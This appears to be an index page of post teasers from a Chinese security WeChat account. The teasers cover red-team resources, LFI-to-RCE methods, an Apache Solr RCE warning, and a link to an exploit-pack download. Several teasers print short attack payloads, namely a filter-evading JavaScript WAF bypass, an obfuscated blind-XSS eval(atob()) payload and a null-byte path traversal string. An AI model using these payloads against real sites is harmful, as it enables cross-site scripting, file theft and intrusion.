下载地址:https://share.weiyun.com/3ygRzAhf 本文始发于微信公众号(Khan安全攻防实验室):神兵利器 - 800个1day Immunity Canvas 7.26
PHP一个有趣的类型混淆
MoP预期的解决方案、在PHP非调试模式下,一个有趣的类型混淆https://github.com/php/php-src/blob/9234446ca04a4bf897988d977835d0391...
推荐一些红蓝对抗渗透实战等干货资源
时刻保持对安全领域专业知识的输入是非常重要的。基于此,特整理分享6个干货满满的号主。以下排名不分先后!!EchoSec萌新专注于网安学习,WEB渗透,内网渗透,移动安全,红蓝对抗,漏洞复现,学习总结...
代码审计之SSRF
SSRF...
日报
原文始发于微信公众号(Khan安全攻防实验室):日报
战技法 - 红队哪里逃
哪有什么红蓝对抗,只不过是一个小县城可怜男孩的想象 原文始发于微信公众号(Khan安全攻防实验室):战技法 - 红队哪里逃
漏洞预警:Apache Solr 远程代码执行漏洞
00x01 漏洞背景Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通...
WAF Bypasser
d=document,b='`',d['loca'+'tion']='javascript:aler'+'t'+b+domain+b 原文始发于微信公众号(Khan安全攻防实验室)...
Blind XSS
Payload:"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...
黑客10秒无钥匙开走特斯拉:重大漏洞曝出
关注我们带你读懂网络安全不止特斯拉,有不少能手机解锁的车都可以用同样的方法破解,智能门锁也可以。编辑:泽南如今,很多特斯拉车主都已习惯不带钥匙用手机解锁车辆,但最近一位网络安全研究人员已经展示了「无钥...
从本地文件包含到RCE的十种方法
文章来源 :Khan安全攻防实验室文件上传PHP包装器日志文件/proc/self/environ/proc/*/fdPHP会话PHPinfo()/tmp文件PHP Assert()函数读取...
文件读取 WAF 绕过
.%00./file.php 原文始发于微信公众号(Khan安全攻防实验室):文件读取 WAF 绕过
3